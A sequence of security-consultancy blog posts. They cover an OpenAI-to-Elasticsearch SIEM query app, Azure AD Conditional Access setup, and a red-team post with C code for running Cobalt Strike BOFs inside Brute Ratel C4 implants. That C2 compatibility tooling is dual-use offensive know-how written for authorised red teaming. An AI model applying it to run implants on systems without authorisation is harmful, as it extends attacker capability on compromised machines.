  • Presence Penalty: The presence penalty parameter allows you to encourage or discourage the model from including specific words or phrases in its response. By increasing the presence penalty (e.g., setting it to a positive value), you can make the model avoid certain words or topics. Conversely, setting a negative value can encourage the model to include specific words or phrases.
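To illustrate how these parameters travel together, here is a minimal sketch of a request payload for the (legacy) Completions endpoint used with text-davinci-003. The values are illustrative placeholders, not tuned recommendations:

```python
# Sketch: assembling the playground parameters into a Completions
# request payload. In the legacy openai Python library this would be
# passed as openai.Completion.create(**payload).

def build_completion_payload(prompt):
    return {
        "model": "text-davinci-003",
        "prompt": prompt,
        "temperature": 0.1,        # low: focused, deterministic output
        "max_tokens": 512,         # cap the length of the response
        "top_p": 1.0,              # consider the full probability mass
        "frequency_penalty": 0.0,  # no penalty on repeated tokens
        "presence_penalty": 0.0,   # no push towards or away from topics
    }
```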

Following that, we can proceed to export the code based on the programming language we are using for our chat web app. This will allow us to obtain the necessary code snippets tailored to our preferred language.

playground openai
OpenAI Playground code snippet

Also, it is worth mentioning that we stumbled upon an impressive attempt at, where you can check how ChatGPT translates a search sentence into an Elasticsearch DSL query (or even SQL).

Returning to our experimental use case, our web app consists of two components: the client side and the server side. On the client side, we have a chat user interface (UI) where users can input their questions or queries. These questions are then sent to the server side for processing.

client custom chat app elasticsearch openaiai
UI chat

On the server side, we enhance the user’s questions by combining them with a predefined text to create a prompt. This prompt is then sent to the OpenAI API for processing and generating a response.
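A minimal sketch of that server-side prompt assembly is shown below. The instruction text and template are hypothetical; the actual prompt was tuned in the OpenAI playground:

```python
# Sketch: combine the user's question with a predefined instruction
# to form the prompt sent to the OpenAI API. The wording here is a
# placeholder, not the prompt used in the real application.

PROMPT_TEMPLATE = (
    "Translate the following question into a valid Elasticsearch DSL "
    "query (JSON only, no explanation) for the 'winlogbeat' index.\n"
    "Question: {question}\n"
    "Query:"
)

def build_prompt(question):
    return PROMPT_TEMPLATE.format(question=question.strip())
```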

prompt send to openai
Backend code snippet- prompt OpenAI api

Once we receive the response, we perform some basic checks, such as verifying if it is a valid JSON object, before forwarding the query to our SIEM API, which in this case is Elastic. Finally, we send the reply back to the client by transforming the JSON response into an HTML table format.
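These checks and the table transformation can be sketched as follows. This is simplified and assumes the results arrive as a list of flat dicts; the real application performs more validation:

```python
import json
from html import escape

def parse_model_reply(reply):
    """Return the query as a dict, or None if the reply is not a JSON object."""
    try:
        query = json.loads(reply)
    except (ValueError, TypeError):
        return None
    return query if isinstance(query, dict) else None

def rows_to_html_table(rows):
    """Render a list of flat dicts as a basic HTML table."""
    if not rows:
        return "<p>No results</p>"
    headers = list(rows[0])
    head = "".join(f"<th>{escape(h)}</th>" for h in headers)
    body = "".join(
        "<tr>" + "".join(f"<td>{escape(str(r.get(h, '')))}</td>" for h in headers) + "</tr>"
        for r in rows
    )
    return f"<table><tr>{head}</tr>{body}</table>"
```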

But many of the responses from OpenAI API are not correct…
You are absolutely right. Not all responses from the OpenAI API can be guaranteed to be correct or accurate. Fine-tuning the model is a valuable approach to improve the accuracy of the generated results.

Fine-tuning involves training the pre-trained language models like GPT-3 and TextDavinci-3 on specific datasets that are relevant to the desired task or domain. By providing a training dataset specific to our use case, we can enable the model to learn from and adapt to the context, leading to more accurate and tailored responses.

To initiate the fine-tuning process, we would need to prepare a training dataset comprising a minimum of 500 examples. This dataset should cover a diverse range of scenarios and queries related to our specific use case. By training the model on this dataset, we can enhance its performance and ensure that it generates more accurate and contextually appropriate responses for our application.

{"prompt": "show me the last 5 logs from the user sotos", "completion": " {\n\"query\": {\n    \"match\": {\n..... "}
{"prompt": "...........", "completion": "................."}
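A small sketch for producing and sanity-checking such a JSONL training file follows. The example completion and the `user.name` field are illustrative placeholders:

```python
import json

# Sketch: write prompt/completion pairs to a JSONL file and verify
# each line parses as a JSON object with the expected keys.

examples = [
    {"prompt": "show me the last 5 logs from the user sotos",
     "completion": ' {"query": {"match": {"user.name": "sotos"}}, "size": 5}'},
]

def write_jsonl(path, records):
    with open(path, "w", encoding="utf-8") as f:
        for rec in records:
            f.write(json.dumps(rec) + "\n")

def check_jsonl(path):
    """Every line must be a JSON object with prompt and completion keys."""
    with open(path, encoding="utf-8") as f:
        for line in f:
            rec = json.loads(line)
            assert {"prompt", "completion"} <= rec.keys()
```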

Even if we invest effort in fine-tuning the model and striving for improvement, it is important to acknowledge that new versions and functionalities are regularly integrated into the Elasticsearch query language. It is also worth noting that ChatGPT’s knowledge is limited to information available up until September 2021. Like numerous other companies, Elastic has recently developed a plugin that enables ChatGPT to tap into Elastic’s up-to-date knowledge base and provide assistance with the latest features introduced by Elastic.

Everything seems perfect so far, but…what about security and privacy of data?

Indeed, privacy and security are important concerns when dealing with sensitive data, especially in scenarios where queries or requests might expose potentially confidential information. In the described scenario, the actual logs are not shared with OpenAI, but the queries themselves reveal certain information, such as specific usernames or host names (e.g., “find the logs for the user mitsos” or “show me all the failed logon attempts from the host WIN-SOTO”).

In accordance with the data usage policies of the OpenAI API (in contrast to ChatGPT), OpenAI does not use data submitted through the API to train its models or enhance its offerings. It is worth noting, however, that data transmitted to the API is handled by servers situated in the United States, and OpenAI retains the data you submit via the API for up to 30 days for the purpose of monitoring potential abuse. Nevertheless, OpenAI grants you the ability to opt out of this monitoring, ensuring that your data is neither stored nor processed; to exercise this option, you can make use of the provided form. Consequently, each API call initiates and concludes your data’s lifecycle: the data is transmitted through the API, the API call’s response contains the resulting output, and no data is retained across successive API requests.

In conclusion, by leveraging OpenAI’s language processing capabilities, organizations can empower security analysts to express their query intentions in a natural language format. This approach streamlines the SIEM query creation process, enhances collaboration, and improves the accuracy and effectiveness of security monitoring and incident response. With OpenAI’s assistance, bridging the gap between human language and SIEM query language becomes an achievable reality in the ever-evolving landscape of cybersecurity. Last but not least, the privacy issue surrounding ChatGPT and OpenAI API usage raises a significant point that necessitates thoughtful consideration, before creating new implementations.

nikos sam

Nikos Samartzopoulos

Nikos is a Senior Consultant in the SOC Engineer Team. With a strong background in the data field and extensive knowledge of the Elastic Stack, Nikos has honed his abilities in architecting, deploying, and overseeing Elastic SIEM systems that excel at monitoring, detecting, and swiftly responding to security incidents.

Enforce Zero Trust in Microsoft 365 – Part 3: Introduction to Conditional Access


This blog post is the third blog post of a series dedicated to Zero Trust security in Microsoft 365.

In the first two blog posts, we set the basics by going over the free features of Azure AD that can be implemented in an organization that starts its Zero Trust journey in Microsoft 365. We went over the Security Defaults, the per-user MFA settings and some Azure AD settings that allowed us to improve our default security posture when we create a Microsoft 365 environment.

Previous blog posts:


In this blog post, we will see what Azure AD Conditional Access is, how it can be used to further improve security and introduce its integration capabilities with other services.

As a reminder, our organization has just started with Microsoft 365. However, we have decided to go for Microsoft 365 for our production environment. Therefore, we want to have a look at a more advanced feature, Azure AD Conditional Access policies. This feature requires an Azure AD Premium P1 license, which comes as a standalone license or is included in some Microsoft 365 licenses (Microsoft 365 E3/A3/G3/F1/F3, Enterprise Mobility & Security E3, Microsoft 365 Business Premium, and higher licenses). Note that a license should be assigned to each user in scope of any Conditional Access policy.

Azure AD Conditional Access uses identity-driven signals to make decisions and enforce policies. Policies can be seen as if-then statements. For instance, if a user wants to access SharePoint Online, which is a Microsoft cloud application that can be integrated in such policies, the user’s request is required to meet specific requirements defined in those policies. Let’s now see what the capabilities of those policies are.

Conditional Access

This part will be more theoretical, to make sure everyone has the basics. Therefore, if you are already familiar with Azure AD Conditional Access policies, you can jump directly to the next section for the implementation, where we go over some prerequisites and important actions, based on our hands-on experience, that need to be taken to avoid issues when setting up those policies.

Conditional Access signals

As we have seen, signals will be considered to make a decision. It is possible to configure the following signals:

  • User, group membership or workload identities (also known as service principals or managed identities in Azure): It is possible to target or exclude specific users, groups, or workload identities from a Conditional Access policy;
  • Cloud apps or actions: Specific cloud applications such as Office 365, Microsoft Azure Management, Microsoft Teams, etc. can be targeted by a policy. Moreover, specific user actions like registering security information (registering for MFA or Self-Service Password Reset) or joining devices can be included as well. Finally, authentication contexts can also be included. Authentication contexts are a bit different, as they can be used to protect specific sensitive resources accessed by users, or user actions, in the environment. We will discuss authentication contexts in detail in a later blog post;
  • Conditions: With an Azure AD Premium P1 license, specific conditions can be set. This includes:
    • The device platforms: Android, iPhone, Windows Phone, Windows, macOS and Linux;
    • The locations: Conditional Access works with Named Locations which can include country/countries or IP address(es) that can be seen as trusted or untrusted;
    • The client apps: client apps which support modern authentication: Browser and Mobile apps and desktop clients; and legacy authentication clients: Exchange ActiveSync clients and other clients;
    • Filter for devices: allows targeting or excluding devices based on their attributes, such as compliance status in the device management solution, whether the device is managed in Microsoft Endpoint Manager or on-premises, or registered in Azure AD, as well as custom attributes that have been set on devices;
    • Note that all these conditions need to match for the policy to apply. If an excluded condition, such as a location, matches an attempt to access an application, the policy will not apply. Finally, if multiple policies match, they will all apply, and access controls will be combined (the most restrictive action will be applied in case of conflicts).

Conditional Access access controls

Then, we have the access controls which are divided into two main categories, the “grant” and the “session” controls. These access controls define the “then do this” part of the Conditional Access policy (if all conditions have matched as mentioned previously). They can be used to allow or block access, require MFA, require the device to be compliant or managed as well as other more specific controls.

Grant controls

  • Block access: if all conditions have matched, then block access;
  • Grant access: if all conditions have matched, then grant access and optionally apply one or more of the following controls:
    • No controls are checked: Single-Factor Authentication is allowed, and no other access controls are required;
    • Require Multi-Factor Authentication;
    • Require authentication strength: allows to specify which authentication method is required for accessing the application;
    • Require device to be marked as compliant: this control requires devices to be compliant in Intune. If the device is not compliant, the user will be prompted to make the device compliant;
    • Require Hybrid Azure AD joined devices: this control requires devices to be hybrid Azure AD joined meaning that devices must be joined from an on-premises Active Directory. This should be used if devices are properly managed on-premises with Group Policy Objects or Microsoft Endpoint Configuration Manager, formerly SCCM, for example;
    • Require approved client apps: approved client apps are defined by Microsoft and represent applications that support modern authentication;
    • Require app protection policy: app protection policies can be configured in Microsoft Intune as part of Mobile Application Management. This control does not require mobile devices to be enrolled in Intune and therefore works with bring-your-own-device (BYOD) scenarios;
    • Require password change;
    • For multiple controls (when multiple of the aforementioned controls are selected):
      • Require all the selected controls;
      • Require one of the selected controls.

Session controls

  • Use app enforced restrictions: app enforced restrictions require Azure AD to pass device information to the selected cloud app to know if a connection is from a compliant or domain-joined device to adapt the user experience. This control only works with Office 365, SharePoint Online and Exchange Online. We will see later how this control can be used;
  • Use Conditional Access App Control: this is the topic of a later blog post, but it allows to enforce specific controls for different cloud apps with Microsoft Defender for Cloud Apps;
  • Sign-in frequency: this control defines how often users are required to sign in again (every x hours or days). The default period is 90 days;
  • Persistent browser session: when a persistent session is allowed, users remain signed in even after closing and reopening their browser window;
  • Customize continuous access evaluation: continuous access evaluation (CAE) allows access tokens to be revoked based on specific critical events in near real time. This control can be used to disable CAE. Indeed, CAE is enabled by default in most cases (CAE migration);
  • Disable resilience defaults: when enabled, which is the case by default, this setting allows extending access to an existing session while enforcing Conditional Access policies. If the policy can’t be evaluated, access is determined by resilience settings. On the other hand, if disabled, access is denied once the session expires;
  • Require token protection for sign-in sessions: this new capability has been designed to reduce attacks using token theft (stealing a token, hijacking or replay attack) by creating a cryptographically secure tie between the token and the device it is issued to. At the time of writing, token protection is in preview and only supports desktop applications accessing Exchange Online and SharePoint Online on Windows devices. Other scenarios will be blocked. More information can be found here.

Conditional Access implementation

Before getting started with the implementation of Conditional Access policies, there are a few important considerations. Indeed, the following points might determine if our Zero Trust journey is a success or a failure in certain circumstances.

Per-user MFA settings

If you decided to go for the per-user MFA settings during the first blog post, you might consider the following:

  • As mentioned before, Conditional Access policies can be used to enforce a sign-in frequency. However, this can also be achieved using the ‘remember multi-factor authentication’ setting. If both settings are configured, the sign-in frequency enforced on end users will be a mix of both configurations and will therefore lead to users being prompted unexpectedly;
  • If trusted IPs, which require an Azure AD Premium P1 license, have been configured in the per-user MFA settings, they will conflict with named locations in Azure AD Conditional Access. Named locations allow you to define locations based on countries or IP address ranges that can then be used to allow or block access in policies. Besides that, if possible, named locations should be used because they allow more fine-grained configurations as they do not automatically apply to all users and in all scenarios;
  • Finally, before enforcing MFA with Conditional Access policies, all users should have their MFA status set to disabled.

Security Defaults

Moreover, if you opted for Security Defaults, they need to be disabled, as they can’t be used together with Conditional Access.

How and where to start?

Now that we have some concepts about Conditional Access and some considerations for the implementation, we can start with planning the implementation of our policies. First, we need to ensure that we know what we want to achieve and what the current situation is. In our case, we first want to enforce MFA for all users to prevent brute force and protect against simple phishing attacks.

However, there might be some user accounts used as service accounts in our environment, such as the on-premises directory synchronization account for hybrid deployments, which can’t perform multi-factor authentication. Therefore, we recommend identifying these accounts and excluding them from the Conditional Access policy. However, because MFA would not be enforced on these accounts, they are inherently less secure and prone to brute force attacks. For that purpose, Named Locations could be used to only allow these service accounts to log in from a defined trusted location such as the on-premises network (this now requires an additional license for each workload identity that you want to protect: the Microsoft Entra Workload Identities license). Except for the directory synchronization account, we do not recommend the use of user accounts as service accounts. Other solutions are provided by Microsoft to manage applications in Azure in a more secure way.

Our first policy could be configured as follows (note that using a naming convention for Conditional Access policies is a best practice as it eases management):

1. Assign the policy to all users (which includes all tenant members as well as external users) and exclude service accounts (emergency/break-the-glass accounts might also need to be excluded):

Conditional Access policy assignments

2. Enforce the policy for all cloud applications:

Cloud applications
Cloud applications

3. Require MFA and enforce a sign-in frequency of 7 days:

Access controls
Access controls

4. Configure the policy in report-only mode first:

Report-only mode
Report-only mode

We always recommend configuring Conditional Access policies in report-only mode before enabling them. The report-only feature will generate logs the same way as if the policies were enabled. This will allow us to assess any potential impact on service accounts, on users, etc. After a few weeks, if no impact has been discovered, the policy can be switched to ‘On’. Note that there might be some cases where you may want to shorten or even skip this validation period.
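For reference, the policy from steps 1 to 4 maps roughly onto a Microsoft Graph conditionalAccessPolicy body like the following sketch. The GUIDs are placeholders for the excluded service and break-the-glass accounts; verify the field names against the current Graph schema before automating anything:

```python
# Sketch: the policy above expressed as a Microsoft Graph
# conditionalAccessPolicy body (POST /identity/conditionalAccess/policies).
# GUIDs and the display name are placeholders.

policy = {
    "displayName": "CA001 - Require MFA for all users",
    "state": "enabledForReportingButNotEnforced",  # report-only mode
    "conditions": {
        "users": {
            "includeUsers": ["All"],
            "excludeUsers": ["<service-account-guid>", "<break-glass-guid>"],
        },
        "applications": {"includeApplications": ["All"]},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
    "sessionControls": {
        "signInFrequency": {"isEnabled": True, "type": "days", "value": 7},
    },
}
```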

These logs can be easily accessed in the ‘Insights and reporting‘ panel in Conditional Access:

Conditional Access Insights and reporting
Conditional Access Insights and reporting


In this third blog post, we learned about Conditional Access policies by going over a quick introduction on Conditional Access signals and access controls. Then, we went over some implementation considerations to make sure our Zero Trust journey is a success by preventing unexpected behaviors and any impact on end users. Finally, we implemented our very first Conditional Access policy to require Multi-Factor Authentication on all users except on selected service accounts (which is not the best approach as explained above).

If you are interested in how NVISO can help you plan your Conditional Access policy deployment and/or support you during the implementation, feel free to reach out or to check our website.

In my next blog post, we will see which policies can be created to enforce additional access controls without requiring user devices to be managed in Intune to further protect our environment.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested in DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Introducing CS2BR pt. I – How we enabled Brute Ratel Badgers to run Cobalt Strike BOFs

If you know all about CS, BRC4 and BOFs you might want to skip this introduction and get right into the problem statement. You can also jump right to the solution.


When we conduct Red Team assessments at NVISO, we employ a wide variety of proprietary and open source tools. One central component in these assessments is the command & control (C2) framework we use to remotely interact with compromised machines and move laterally through our targets’ networks. They usually feature a C2 server for central access, implants (analogous to bots in botnets) that execute commands, and client interfaces that allow red team operators to interact with the implants. Among others, there are two popular C2 frameworks that we use: Cobalt Strike and Brute Ratel C4.

Both C2s are proprietary and they have a lot of features in common. A particular capability they share is execution of beacon object files (BOFs). Normally you work with object files during compilation of C and C++ programs as they contain the compiled code of individual C/C++ source files and are not directly executable.

CS and BRC4 provide a mechanism to send BOFs to implants and execute their code on the remote machines. And the best thing about it is: one can write their own BOFs and have implants execute them. This comes with quite a set of benefits:

  • Implants don’t need to implement a lot of capabilities as those capabilities can be streamed and executed on demand, reducing the implant’s footprint.
  • Using custom BOFs, operators have finer control over the exact way an implant interacts with the target system. They can choose to implement new features or operate more covertly and OPSEC-safe.
  • While the C2s might be proprietary, BOFs can be open-source and shared with everyone.

There are many open-source BOFs available, such as TrustedSec’s CS-Situational-Awareness, that can easily be used in various C2s like CS and sliver. Nearly all of these BOFs use Cobalt Strike’s de-facto BOF API standard – which isn’t compatible with Brute Ratel’s BOF API. Thus, the vast majority of available BOFs is incompatible with BRC4.

Turns out there are only very few BRC4 BOFs!

In this blog post, we present an approach to solve this problem that enables Brute Ratel’s implants (“badgers”) to run BOFs written for Cobalt Strike. The tool we developed based on this approach will be presented in a follow-up blog post.

I. So what’s the exact problem?

In theory, any BOF can be executed by either C2 framework as long as it doesn’t make use of the C2-specific APIs. In practice, this doesn’t make much sense, since these APIs are required for basic tasks such as sending information back to operators.

The following paragraphs break down both BOF APIs in order to help understand how they’re incompatible.

Cobalt Strike’s BOF C API

Cobalt Strike BOF C API

Cobalt Strike splits its APIs into roughly four distinct groups:

  • Data Parser API: provides utilities to parse data passed to the BOF. This allows BOFs to receive arbitrary data as input, such as regular string-based values but also arbitrary binary data like files.
  • Output API: lets BOFs output raw buffers and format output. The output is sent back to operators.
  • Format API: allows BOFs to format output in buffers for later transmission.
  • Internal APIs: feature several utilities related to user impersonation, privileges and process injection. BRC4 doesn’t currently have an equivalent API.

Furthermore, the signature of CS BOFs entrypoints is void go(char*, int) and explicitly expects binary data to be passed and to be used with the Data Parser API.

Brute Ratel C4’s BOF C API

Brute Ratel BOF C API

Brute Ratel C4’s API on the other hand comes as a loose list that I grouped in this diagram for simplicity:

  • Output API: contains output printf-like functions for regular ANSI-C strings and wide-char strings.
  • String API: features various strlen and strcmp functions for regular ANSI-C strings and wide-char strings.
  • Memory API: provides convenient memory-related functions for allocating, freeing, copying and populating buffers.

The signature of BRC4 BOF entrypoints is void coffee(char**, int, WCHAR**) and explicitly expects string-based inputs (similar to a regular executable’s void main(int argc, char* argv[])).

Comparison & Conclusion

When comparing their APIs, it becomes apparent that CS and BRC4 follow different approaches to their APIs:

  • While both C2s provide some convenience APIs, Cobalt Strike’s APIs feature a higher abstraction level. As a result, CS doesn’t only feature an API dedicated to output (as does BRC4) but also one for formatting output.
  • CS provides advanced APIs (e.g. the “internal” ones) while BRC4 provides mostly low-level APIs.
  • Both differ greatly in their approach to passing inputs to BOFs: Cobalt Strike allows passing arbitrary binary data and provides a separate API for this task while BRC4 sticks to the traditional main entrypoint and its GUI only allows operators to pass strings to BOFs.
CS BOFs are (almost) the same as BRC4 BOFs - or at least BRC4 would like you to think that.

Actually, BRC4’s documentation makes porting BOFs from CS to BRC4 look like an easy task. Simply trying to map CS’s BOF API to BRC4’s shows that this is a more intricate task:

Cobalt Strike and Brute Ratel C4 BOF API mapping

As you can see, there are only very few CS APIs that (more or less) can be mapped to BRC4’s APIs. What are the implications for porting CS BOFs to BRC4 then? Well, it’s going to require some engineering.

II. Working out a solution

Now that we know how BRC4’s and CS’s BOF APIs are different from each other, we can work out a solution. Well, I’d love to tell you that that was the approach I took: read up on the problem’s intricacies first and then work out a well-structured and thought out solution. Things went a little different though, and I’d like to show you.

Approach 1: The naïve way

My first approach at porting BOFs from CS to BRC4 was based on the BRC4 documentation and involved only three steps:

  • Replace the go(char*, int) entrypoint with coffee(char**, int, WCHAR**).
  • Remove CS API imports (“beacon.h”) and add BRC4 API imports (“badger_exports.h”).
  • Replace uses of CS APIs with BRC4 APIs.

That looks easy to do! So let’s test this using the DsGetDcNameA example they posted in the documentation:


Nice, that worked very well! How about a real-world example of an open-source BOF? Outflank’s Winver BOF grabs the exact Windows version of the victim machine. Again, we replace the entrypoint, API imports and API uses:

#include "badger_exports.h"


VOID coffee(char** Args, int len, WCHAR** dispatch) {
	// snip
	dwUBR = ReadUBRFromRegistry();
	if (dwUBR != 0) {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR);
	} else {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber);
	}
	// snip
}
Common output with BOFs: not much to work with!

Running this gives us… nothing! This is a problem you’ll encounter when working with BOFs: you won’t receive any feedback when they aren’t executed or crash, making debugging and identifying the root cause just a bit harder.

But what was the problem in this case? Well, I got stuck for a bit at this point and after digging into the compiled BOF I noticed that there were WinAPI calls in the code that were not explicitly declared as imports:

DWORD ReadUBRFromRegistry() {
	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	// snip
}

Cobalt Strike’s BOF documentation says that “GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are available within BOF files” and don’t need to be explicitly imported by BOFs. This doesn’t apply to BRC4 though so imports for those need to be added:


// Declare the KERNEL32 imports (BRC4 does not provide them by default)
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleW(LPCWSTR);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryW(LPCWSTR);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FreeLibrary(HMODULE);

// Redefine the unprefixed names so the original BOF code compiles unchanged
#ifdef GetProcAddress
#undef GetProcAddress
#endif
#define GetProcAddress KERNEL32$GetProcAddress
#ifdef GetModuleHandleA
#undef GetModuleHandleA
#endif
#define GetModuleHandleA KERNEL32$GetModuleHandleA
#ifdef GetModuleHandleW
#undef GetModuleHandleW
#endif
#define GetModuleHandleW KERNEL32$GetModuleHandleW
#ifdef LoadLibraryA
#undef LoadLibraryA
#endif
#define LoadLibraryA KERNEL32$LoadLibraryA
#ifdef LoadLibraryW
#undef LoadLibraryW
#endif
#define LoadLibraryW KERNEL32$LoadLibraryW
#ifdef FreeLibrary
#undef FreeLibrary
#endif
#define FreeLibrary KERNEL32$FreeLibrary

Note that the macros allow us to leave the original function calls in the BOF untouched. If we didn’t do that, we would need to prepend KERNEL32$ to every call of the functions listed above.

After adding those and recompiling, we can run the BOF again and now it runs just fine:

Running a CS BOF in BRC4 after adding default imports

That’s great! However this approach is pretty limited. Let’s have a look at some of its shortcomings.


The naïve approach works great for very simple BOFs that don’t use any of CS’s higher-level APIs. Many of the advanced BOFs use some of those APIs though.

Let’s examine TrustedSec’s sc_enum as it’s a very useful BOF and great example: it allows an operator to enumerate Windows services on a target machine. If we were to perform our simple 3-step approach again we’d hit a roadblock:

VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
) {
	const char * hostname = NULL;
	const char * servicename = NULL;
	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	hostname = BeaconDataExtract(&parser, NULL);
	// snip
}

You can see that this BOF takes the hostname parameter from the “Data Parser API” (BeaconDataExtract), which has no equivalent in BRC4.

At this point I figured that instead of coming up with some hacky fix I’d work out a proper solution that works more reliably and is more flexible: after all, I didn’t want to manually edit all the BOFs I use on a regular basis and troubleshoot API replacements.

Approach 2: True Compatibility

Since replacing APIs was already tricky in some cases and just impossible for higher-level APIs, I was searching for a solution that allowed me to (ideally) not touch any API calls in BOFs’ source code at all. There are two challenges to solve: allowing BOFs to call CS APIs and transforming their entrypoint to BRC4’s signature.

Compatibility Layer

Luckily, I wasn’t the first one to attempt this: TrustedSec’s COFFLoader is able to execute arbitrary compiled CS BOFs, which means that it treats BOFs as black boxes and introduces a compatibility layer that implements the CS BOF API. With this approach in mind, I modelled the following design:

The compatibility layer

The idea is simple:

The CS API definitions included in BOF source code, usually called beacon.h, are replaced with stubs that don’t import the actual API but route calls into the compatibility layer. The compatibility layer imports the BRC4 BOF API and calls it as needed.

COFFLoader’s compatibility layer is very readable and straightforward to understand. It implements all the higher-level concepts missing in the BRC4 API. One only needs to copy their implementation and swap out some bits that require imports, such as string or memory utilities. These should be replaced with BRC4’s equivalents (e.g. replacing memcpy with BadgerMemcpy) or, less ideally, with MSVCRT imports (e.g. vsnprintf for string formatting). For example, the BeaconFormatAlloc API can be implemented as follows:

void BeaconFormatAlloc(formatp* format, int maxsz) {
	if (format == NULL) return;
	format->original = (char*)BadgerAlloc(maxsz);
	format->buffer = format->original;
	format->length = 0;
	format->size = maxsz;
}
For the sake of completeness: the compatibility layer should also include imports of the WinAPI functions included by default in CS (GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary).
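Another piece the compatibility layer must supply is the Data Parser API that sc_enum tripped over earlier. A portable sketch modelled on COFFLoader’s implementation (the struct layout and the 4-byte length prefixes are assumptions borrowed from that project):

```c
#include <string.h>

typedef struct {
    char *original;  /* start of the argument blob */
    char *buffer;    /* read cursor */
    int   length;    /* bytes remaining */
    int   size;      /* payload size */
} datap;

void BeaconDataParse(datap *parser, char *buffer, int size) {
    if (parser == NULL) return;
    parser->original = buffer;
    parser->buffer   = buffer + 4;  /* skip the leading total-size field */
    parser->length   = size - 4;
    parser->size     = size - 4;
}

char *BeaconDataExtract(datap *parser, int *size) {
    int len = 0;
    char *out;
    if (parser == NULL || parser->length < 4) return NULL;
    memcpy(&len, parser->buffer, 4);  /* 4-byte length prefix per entry */
    parser->buffer += 4;
    out = parser->buffer;
    parser->buffer += len;
    parser->length -= 4 + len;
    if (size != NULL) *size = len;
    return out;
}
```

In an actual port, memcpy would itself be swapped for BadgerMemcpy following the substitution rule described earlier.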

As a result, following this approach won’t tamper with the BOFs’ original logic but lets us implement the CS API ourselves, which in turn allows our BOFs to run in BRC4 now. Well, almost: the entrypoint isn’t compatible yet, and that’s not necessarily trivial.

Wrapping the Entrypoint

As we saw in the first attempt, porting the entrypoint from CS to BRC4 BOFs isn’t really tricky as we only need to change the function signature. It does get tricky if our BOF uses its start parameters (and thereby CS’s Data Parser API) though:

This API allows passing arbitrary data to CS BOFs. To achieve this, CS BOFs can ship with CNA scripts that allow the CS client to query input data (such as files) from operators, which the CNA assembles into a binary blob. This blob is sent along with the BOF itself to the implant (“beacon”). The BeaconData* APIs (which make up the Data Parser API) allow BOFs to disassemble this blob into structured data again. BRC4 doesn’t have this scripting capability and its BOF entrypoint only allows passing string-based arguments instead.

Again, COFFLoader solved the same problem before: it comes with a Python script that encodes arbitrary input into a hex-string that can be deserialized to a byte-buffer and passed to CS BOF entrypoints. Following the same approach, I worked out the following rather simple addition to the design above:

Wrapped entrypoint

Once more, the idea is simple:

  • Operators encode their inputs to a string and pass it to the BOF using BRC4’s coffexec command.
  • A minimal BRC4 entrypoint is appended to the BOF source code.
  • This entrypoint decodes the supplied input string into a buffer and passes that buffer to the original CS entrypoint.
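The decoding side of that wrapper can be sketched in portable C (hex encoding modelled on COFFLoader’s scheme; go() is a stand-in for the original CS entrypoint, and the BRC4 entrypoint signature is simplified here):

```c
#include <stddef.h>

static int hex_nibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decodes a hex string ("48656c6c6f") into out; returns byte count or -1. */
static int hex_decode(const char *hex, unsigned char *out, size_t outsz) {
    size_t n = 0;
    for (; hex[0] != '\0' && hex[1] != '\0'; hex += 2) {
        int hi = hex_nibble(hex[0]), lo = hex_nibble(hex[1]);
        if (hi < 0 || lo < 0 || n >= outsz) return -1;
        out[n++] = (unsigned char)((hi << 4) | lo);
    }
    return (int)n;
}

/* Stand-in for the original, untouched CS entrypoint. */
static void go(char *args, unsigned long len) {
    (void)args; (void)len;  /* ...original BOF logic runs here... */
}

/* Minimal BRC4-style entrypoint wrapping go(); signature simplified. */
void coffee(char **argv, int argc) {
    static unsigned char buf[4096];
    int len = (argc > 0) ? hex_decode(argv[0], buf, sizeof(buf)) : 0;
    if (len >= 0) go((char *)buf, (unsigned long)len);
}
```

The operator-side encoder simply performs the inverse: it serializes the inputs into the length-prefixed blob the Data Parser API expects and hex-encodes the result.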


In essence, this approach consists of only three steps:

  1. Replace CS API imports with compatibility layer implementations
  2. Wrap CS entrypoint with a custom BRC4 entrypoint that prepares input for the Data parser API
  3. Manually encode execution parameters

This still isn’t a perfect solution but leaves us with a couple of pros and cons:

  • ✅ Doesn’t touch the original BOF’s logic
  • ✅ Flexibility: the same approach works for most (if not all) BOFs out there
  • ❌ Requires (somewhat) elaborate compatibility implementation
  • ❌ Requires some way to inject the compatibility layer (e.g. via source code)

III. Coming up next

Now that we have a solid and flexible approach to run CS BOFs on BRC4, there’s only one thing missing – a tool that automates it all!

We will publish CS2BR – a tool that does just that – as an open source project on Github along with a follow-up blogpost all about it soon. Stay tuned!

Moritz Thomas


Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

We’re celebrating our 10th anniversary!

From 5 people to almost 250 people. From working from our founders’ apartment to five offices in four countries. From an unknown challenger to being a reference in multiple fields in cyber security.

As a company, NVISO has come a long way since 2013 and we want to take a moment to celebrate what we have accomplished together so far.

NVISO celebrates a decade of European cyber security expertise

In 2013, NVISO was founded by five young security professionals with a dream:
To build a home and a hub for cyber security experts, here in the heart of Europe.

